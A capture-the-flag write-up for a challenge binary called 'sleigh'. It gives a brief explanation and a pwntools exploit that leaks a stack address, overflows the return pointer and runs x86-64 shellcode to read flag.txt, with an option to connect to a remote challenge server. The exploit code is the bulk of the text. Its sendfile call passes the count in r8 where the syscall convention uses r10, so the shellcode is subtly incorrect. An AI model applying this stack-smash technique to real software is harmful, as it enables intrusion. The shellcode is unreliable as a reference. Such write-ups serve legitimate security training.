Tags: shellcode bof pwn stack-smash
Rating:
NX Stack is disabled meaning we can write shellcode onto the stack and execute it. We get given a stack leak pointing to the start of the input buffer. So we can write shellcode, overflow the return pointer, ret2shellcode, profit.
```python
#!/usr/bin/env python3
from pwn import *
elf = ELF("./sleigh", checksec=False)
context.binary = elf
rop = ROP(elf)
#context.log_level = "debug"
gs = '''
continue
'''
def conn():
if args.REMOTE:
r = remote("178.62.75.187", 31878)
else:
r = process([elf.path])
if args.GDB:
return gdb.debug(elf.path, gdbscript=gs)
return r
p = conn()
# Shellcode to read flag.txt
shellcode = asm("""
/* open(flag.txt, 0, 0) */
lea rdi, [rip+flag]
xor rsi, rsi
xor rdx, rdx
push 2
pop rax
syscall
/*sendfile(1, rax, 0, 60) */
mov rdi, 1
mov rsi, rax
xor rdx, rdx
mov r8, 60
mov rax, 40
syscall
flag:
.string "flag.txt"
"""
)
p.sendlineafter(b">", b"1")
p.recvuntil(b"sleigh: [")
stackleak = int(p.recv(14), 16)
info(f"Stack leak @ {stackleak}")
payload = flat({0: shellcode, 72: pack(stackleak)})
p.sendlineafter(b">", payload)
p.interactive()
```